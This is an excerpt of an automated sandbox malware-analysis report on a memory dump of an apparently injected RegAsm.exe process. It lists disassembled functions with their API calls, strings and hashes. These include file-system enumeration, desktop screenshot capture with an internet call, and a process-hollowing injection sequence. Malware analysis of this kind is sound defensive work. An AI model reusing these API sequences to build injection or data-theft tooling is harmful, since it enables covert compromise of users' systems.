Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c3e6b3066c7a95dc485a0c26cbb40f8adde3e699622913d0115d84fddacf3846
Instruction ID: 24ab2fdecff4aea25aaf37595f867e89cc527cf5062f7f92dbae7ad74b64ebb3
Opcode Fuzzy Hash: c3e6b3066c7a95dc485a0c26cbb40f8adde3e699622913d0115d84fddacf3846
Instruction Fuzzy Hash: 81219071640705ABC724CFB5DD81BABBBE5AB51314F24482EE61BE73D0D679E9408708

Function 0040DF3B Relevance: 1.7, APIs: 1, Instructions: 221COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040DF40

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Part of subcall function 004119CA: SHGetFolderPathA.SHELL32(00000000,00426D17,00000000,00000000,?), ref: 004119FB

Part of subcall function 004106D1: _EH_prolog.MSVCRT ref: 004106D6
Part of subcall function 004106D1: lstrcpy.KERNEL32(00000000), ref: 00410722
Part of subcall function 004106D1: lstrcat.KERNEL32(?,?), ref: 0041072C

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

Part of subcall function 00410603: lstrcpy.KERNEL32(00000000,r~A), ref: 00410629

Part of subcall function 00411986: _EH_prolog.MSVCRT ref: 0041198B
Part of subcall function 00411986: GetFileAttributesA.KERNEL32(00000000,?,0040C604,?,00426CD2,?,?), ref: 0041199F

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 0040B3D5: _EH_prolog.MSVCRT ref: 0040B3DA

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
String ID:
API String ID: 2625060131-0
Opcode ID: 50f2b6749ffb402f8a016300a46efc8006fe3ece270b9c49cecf7fc0b9e130a3
Instruction ID: 77fcb24f82c8694b42051b02cc291a4d7cdcfd41228390be10bab1af70b44485
Opcode Fuzzy Hash: 50f2b6749ffb402f8a016300a46efc8006fe3ece270b9c49cecf7fc0b9e130a3
Instruction Fuzzy Hash: B4917471C0128CEADF01EBE5D956ADEBBB8AF14304F10405EE44573281DBB81798CBA6

Function 00406946 Relevance: 1.6, APIs: 1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3963afad617024a1773b079ca67985c77571e71ea1df4400f3c02cfcfca6a793
Instruction ID: 32e80b6415e68460cdacb50b38c8cef03d837407fb6c75461c0e5bed1e378453
Opcode Fuzzy Hash: 3963afad617024a1773b079ca67985c77571e71ea1df4400f3c02cfcfca6a793
Instruction Fuzzy Hash: 03411B71A002169FCF14EF94DD849AEBBB1AB05314F12847EE916B7391D7389EA08F58

Function 004119CA Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,00426D17,00000000,00000000,?), ref: 004119FB

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 90ae8a567c0383342a2f4dcffac58ec89887a26beccb833c6bb2ad9cccb0b0bf
Instruction ID: efc4b59454f2786463344c49196b6d278e67beb755601e3b25068b2f42a151b7
Opcode Fuzzy Hash: 90ae8a567c0383342a2f4dcffac58ec89887a26beccb833c6bb2ad9cccb0b0bf
Instruction Fuzzy Hash: 87F01C7991014CBBDB11DB64C8909EDB7FDEBC4300F0095A6A90593280D6309F469F50

Non-executed Functions

Function 004166D7 Relevance: 44.1, APIs: 21, Strings: 4, Instructions: 316stringfileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004166DC
wsprintfA.USER32 ref: 00416702
FindFirstFileA.KERNEL32(?,?), ref: 00416719
memset.MSVCRT ref: 00416730
memset.MSVCRT ref: 0041673E
StrCmpCA.SHLWAPI(?,00427920), ref: 0041675C
StrCmpCA.SHLWAPI(?,00427924), ref: 00416776
wsprintfA.USER32 ref: 0041679A
StrCmpCA.SHLWAPI(?,004276D6), ref: 004167AB
wsprintfA.USER32 ref: 004167D1
wsprintfA.USER32 ref: 004167E5
memset.MSVCRT ref: 004167F7
lstrcat.KERNEL32(?,?), ref: 00416809
strtok_s.MSVCRT ref: 00416842
memset.MSVCRT ref: 00416857
lstrcat.KERNEL32(?,?), ref: 0041686C
PathMatchSpecA.SHLWAPI(?,00000000), ref: 0041688F

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Part of subcall function 00411805: _EH_prolog.MSVCRT ref: 0041180A
Part of subcall function 00411805: GetSystemTime.KERNEL32(?,00427520,00000001,000000C8,00000000,00427722), ref: 0041184A

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

Part of subcall function 004106D1: _EH_prolog.MSVCRT ref: 004106D6
Part of subcall function 004106D1: lstrcpy.KERNEL32(00000000), ref: 00410722
Part of subcall function 004106D1: lstrcat.KERNEL32(?,?), ref: 0041072C

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00416991
strtok_s.MSVCRT ref: 004169C2
FindNextFileA.KERNEL32(000000FF,?), ref: 00416AE5
FindClose.KERNEL32(000000FF), ref: 00416AF6

Strings

%s\%s, xrefs: 004167DF
%s\*.*, xrefs: 004166F7
%s\%s\%s, xrefs: 004167CB
%s\%s, xrefs: 00416794

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcatlstrcpymemsetwsprintf$Find$Filestrtok_s$CloseFirstMatchNextPathSpecSystemTimeUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
API String ID: 264515753-332874205
Opcode ID: 1d97d4bea9d0bb590e1c45bfebefcfbb939f37d3fcbb3f111c3921ace4079810
Instruction ID: 2e473a3c69995decc1f6bb00a24da922fdeaba38dc1eb811dad678f7d9d646b3
Opcode Fuzzy Hash: 1d97d4bea9d0bb590e1c45bfebefcfbb939f37d3fcbb3f111c3921ace4079810
Instruction Fuzzy Hash: 84C180B1900259EFDF20EBA4DC45EEE7BBCAF05304F10405AF519E2192DB789A89CB65

Function 00417591 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 227stringfileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00417596
wsprintfA.USER32 ref: 004175B6
FindFirstFileA.KERNEL32(?,?), ref: 004175CD
StrCmpCA.SHLWAPI(?,004279DC), ref: 004175EA
StrCmpCA.SHLWAPI(?,004279E0), ref: 00417604
wsprintfA.USER32 ref: 00417628
StrCmpCA.SHLWAPI(?,004276E2), ref: 00417639
wsprintfA.USER32 ref: 00417656

Part of subcall function 00410603: lstrcpy.KERNEL32(00000000,r~A), ref: 00410629

Part of subcall function 00406CC8: _EH_prolog.MSVCRT ref: 00406CCD
Part of subcall function 00406CC8: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406CF0
Part of subcall function 00406CC8: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406D07
Part of subcall function 00406CC8: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D23
Part of subcall function 00406CC8: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D3D
Part of subcall function 00406CC8: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406D5E

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00415718: _EH_prolog.MSVCRT ref: 0041571D
Part of subcall function 00415718: CreateThread.KERNEL32(00000000,00000000,00413F49,?,00000000,00000000), ref: 004157C3
Part of subcall function 00415718: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004157CB

wsprintfA.USER32 ref: 0041766A
PathMatchSpecA.SHLWAPI(?,?), ref: 0041767D
lstrcat.KERNEL32(?,?), ref: 004176A9
lstrcat.KERNEL32(?,004279F8), ref: 004176BB
lstrcat.KERNEL32(?,?), ref: 004176CB
lstrcat.KERNEL32(?,004279FC), ref: 004176DD
lstrcat.KERNEL32(?,?), ref: 004176F1
FindNextFileA.KERNEL32(00000000,?), ref: 0041788C
FindClose.KERNEL32(00000000), ref: 0041789B

Strings

%s\%s, xrefs: 00417622
%s\%s, xrefs: 00417664
%s\*, xrefs: 004175B0

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Filelstrcat$H_prologwsprintf$Find$CloseCreatelstrcpy$AllocFirstHandleLocalMatchNextObjectPathReadSingleSizeSpecThreadWait
String ID: %s\%s$%s\%s$%s\*
API String ID: 3254224521-445461498
Opcode ID: 6b8a94867bbb9771041477b0ecd1759ae198edfcb1f1b6b5d1dbf2b535014c2a
Instruction ID: 6d7e0da8afdd0f4fdd6b8c34e8fbf0b819e26811ee753366fe4bc0e8719022dd
Opcode Fuzzy Hash: 6b8a94867bbb9771041477b0ecd1759ae198edfcb1f1b6b5d1dbf2b535014c2a
Instruction Fuzzy Hash: 4E919F71900259EFDF10EBA4DD4AADE7BBDAF05304F10009AF505A2191EB7897C9CBA5

Function 00411FA6 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 162windowCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00411FAB
memset.MSVCRT ref: 00411FD1
GetDesktopWindow.USER32 ref: 00412007
GetWindowRect.USER32(00000000,?), ref: 00412014
GetDC.USER32(00000000), ref: 0041201B
CreateCompatibleDC.GDI32(00000000), ref: 00412025
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00412036
SelectObject.GDI32(00000000,00000000), ref: 00412041
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041205D
GlobalFix.KERNEL32(?), ref: 004120BB
GlobalSize.KERNEL32(?), ref: 004120C7

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Part of subcall function 00410603: lstrcpy.KERNEL32(00000000,r~A), ref: 00410629

Part of subcall function 004043AD: _EH_prolog.MSVCRT ref: 004043B2
Part of subcall function 004043AD: lstrlenA.KERNEL32(00000000), ref: 00404421
Part of subcall function 004043AD: StrCmpCA.SHLWAPI(?,004269A7,004269A3,0042699B,00426997,00426996), ref: 004044A4
Part of subcall function 004043AD: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044C4

SelectObject.GDI32(00000000,?), ref: 00412141
DeleteObject.GDI32(?), ref: 0041215C
DeleteObject.GDI32(00000000), ref: 00412163
ReleaseDC.USER32(00000000,?), ref: 0041216D
CloseWindow.USER32(00000000), ref: 00412174

Strings

image/jpeg, xrefs: 0041207D

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Object$Window$CompatibleCreateDeleteGlobalH_prologSelectlstrcpy$BitmapCloseDesktopInternetOpenRectReleaseSizelstrlenmemset
String ID: image/jpeg
API String ID: 3067874393-3785015651
Opcode ID: 10eb6192ed15acdc1b15bcf371c69d459fefd1462189f07b2974390a592d0b42
Instruction ID: d455e5c1a42edfa22e262a0d746044185c3bec482338a5e581c5ee9da376bc3b
Opcode Fuzzy Hash: 10eb6192ed15acdc1b15bcf371c69d459fefd1462189f07b2974390a592d0b42
Instruction Fuzzy Hash: 9B5107B6800158AFDB01EFE4DD49AEEBBBDEF0A315B10402AFA01E6160D7354A95CB65

Function 00417148 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 201stringmemoryfileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041714D
GetProcessHeap.KERNEL32(00000000,0098967F,?,00000104), ref: 00417165
HeapAlloc.KERNEL32(00000000,?,00000104), ref: 0041716C
wsprintfA.USER32 ref: 00417184
FindFirstFileA.KERNEL32(?,?), ref: 0041719B
StrCmpCA.SHLWAPI(?,004279C0), ref: 004171B8
StrCmpCA.SHLWAPI(?,004279C4), ref: 004171D2
wsprintfA.USER32 ref: 004171F6

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Part of subcall function 00411805: _EH_prolog.MSVCRT ref: 0041180A
Part of subcall function 00411805: GetSystemTime.KERNEL32(?,00427520,00000001,000000C8,00000000,00427722), ref: 0041184A

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

Part of subcall function 004106D1: _EH_prolog.MSVCRT ref: 004106D6
Part of subcall function 004106D1: lstrcpy.KERNEL32(00000000), ref: 00410722
Part of subcall function 004106D1: lstrcat.KERNEL32(?,?), ref: 0041072C

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 004139FA: _EH_prolog.MSVCRT ref: 004139FF
Part of subcall function 004139FA: memset.MSVCRT ref: 00413A20
Part of subcall function 004139FA: memset.MSVCRT ref: 00413A2E
Part of subcall function 004139FA: lstrcat.KERNEL32(?,00000000), ref: 00413A5A
Part of subcall function 004139FA: lstrcat.KERNEL32(?), ref: 00413A78
Part of subcall function 004139FA: lstrcat.KERNEL32(?,?), ref: 00413A8C
Part of subcall function 004139FA: lstrcat.KERNEL32(?), ref: 00413A9F
Part of subcall function 004139FA: StrStrA.SHLWAPI(00000000), ref: 00413B39

FindNextFileA.KERNEL32(00000000,?), ref: 00417325
FindClose.KERNEL32(00000000), ref: 00417334
lstrcat.KERNEL32(?,?), ref: 00417359
lstrcat.KERNEL32(?), ref: 0041736C
lstrlenA.KERNEL32(?), ref: 00417375
lstrlenA.KERNEL32(?), ref: 00417382

Strings

%s\*, xrefs: 0041717E
%s\%s, xrefs: 004171F0

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$H_prolog$lstrcpy$Findlstrlen$FileHeapmemsetwsprintf$AllocCloseFirstNextProcessSystemTime
String ID: %s\%s$%s\*
API String ID: 398052587-2848263008
Opcode ID: 9063d63690015fb3395916009ee4af53f2039d666ee5da54fbc957cd6de02627
Instruction ID: 43d252f522684ec197ab5e7677122d4044a818f52e086935ea7c82d69685aa36
Opcode Fuzzy Hash: 9063d63690015fb3395916009ee4af53f2039d666ee5da54fbc957cd6de02627
Instruction Fuzzy Hash: 6D818C71900259EFDF10EBE4DD49BEEBBBCAF19304F00405AF519A3191EB785688CB65

Function 00416DA3 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 133stringfileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00416DA8
wsprintfA.USER32 ref: 00416DCB
FindFirstFileA.KERNEL32(?,?), ref: 00416DE2
StrCmpCA.SHLWAPI(?,004279A8), ref: 00416E04
StrCmpCA.SHLWAPI(?,004279AC), ref: 00416E1E
lstrcat.KERNEL32(?,?), ref: 00416E53
lstrcat.KERNEL32(?), ref: 00416E66
lstrcat.KERNEL32(?,?), ref: 00416E7A
lstrcat.KERNEL32(?,?), ref: 00416E8A
lstrcat.KERNEL32(?,004279B0), ref: 00416E9C
lstrcat.KERNEL32(?,?), ref: 00416EB0

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Part of subcall function 00406CC8: _EH_prolog.MSVCRT ref: 00406CCD
Part of subcall function 00406CC8: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406CF0
Part of subcall function 00406CC8: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406D07
Part of subcall function 00406CC8: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D23
Part of subcall function 00406CC8: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D3D
Part of subcall function 00406CC8: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406D5E

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00415718: _EH_prolog.MSVCRT ref: 0041571D
Part of subcall function 00415718: CreateThread.KERNEL32(00000000,00000000,00413F49,?,00000000,00000000), ref: 004157C3
Part of subcall function 00415718: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004157CB

FindNextFileA.KERNEL32(00000000,?), ref: 00416F4A
FindClose.KERNEL32(00000000), ref: 00416F59

Strings

%s\%s, xrefs: 00416DC5

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$File$H_prolog$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
String ID: %s\%s
API String ID: 2282932919-4073750446
Opcode ID: 2c8db2e5527253c16c946a31531c9312e251bc8c0886b03b3a6d7270c6c2b978
Instruction ID: e81056fdb73085ba6d6140e95c05785f6c671cba1ac201df8f4fd7a4227fe141
Opcode Fuzzy Hash: 2c8db2e5527253c16c946a31531c9312e251bc8c0886b03b3a6d7270c6c2b978
Instruction Fuzzy Hash: 3A512DB2900119ABCF10EBB4DD49EDE7BBDAF09314F4000AAF615E2151E7389789CFA5

Function 0040FD1A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 128threadinjectionmemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040FD43
memset.MSVCRT ref: 0040FD4F
CreateProcessA.KERNEL32(00000000,004121F6,00000000,00000000,00000000,08000004,00000000,00000000,?,?,?,?,?,00000000,00000000,00000001), ref: 0040FD6F
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,?,?,00000000,00000000,00000001), ref: 0040FD83
GetThreadContext.KERNEL32(?,00000000,?,?,?,00000000,00000000,00000001), ref: 0040FD95
ReadProcessMemory.KERNEL32(?,?,004121F6,00000004,00000000,?,?,?,00000000,00000000,00000001), ref: 0040FDB3
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000000,00000000,00000001), ref: 0040FDC9
ResumeThread.KERNEL32(?,?,?,?,00000000,00000000,00000001), ref: 0040FDD9
WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,?,?,00000000,00000000,00000001), ref: 0040FDF9
WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,?,00000000,00000000,00000001), ref: 0040FE2F
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,?,00000000,00000000,00000001), ref: 0040FE56
SetThreadContext.KERNEL32(?,00000000,?,?,?,00000000,00000000,00000001), ref: 0040FE68
ResumeThread.KERNEL32(?,?,?,?,00000000,00000000,00000001), ref: 0040FE71

Strings

uB, xrefs: 0040FE10, 0040FE38

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
